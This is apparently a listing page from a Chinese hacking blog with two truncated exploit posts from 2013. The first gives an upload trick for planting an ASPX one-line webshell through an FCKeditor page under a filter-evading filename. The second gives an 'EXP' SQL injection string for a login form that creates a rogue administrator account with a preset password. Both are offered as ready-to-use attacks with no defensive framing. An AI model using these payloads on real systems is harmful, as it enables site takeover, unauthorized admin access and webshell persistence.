摘要: IIS7.5解析漏洞http://www.cnk0n9.com/fckeditor/editor/fckeditor.html,上传图片,浏览,上传一个aspx的一句话木马,名字为:a.aspx.a;.a.aspx.jpg..jpg上传后直接得到上传地址 阅读全文
posted @ 2013-09-19 09:55 heikeboy’s Blog 阅读(4065) 评论(0) 推荐(0) 编辑
摘要: EXP: 直接访问UserCenter/login.aspx用户名处输入: 123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into 阅读全文
posted @ 2013-09-19 09:53 heikeboy’s Blog 阅读(242) 评论(0) 推荐(0) 编辑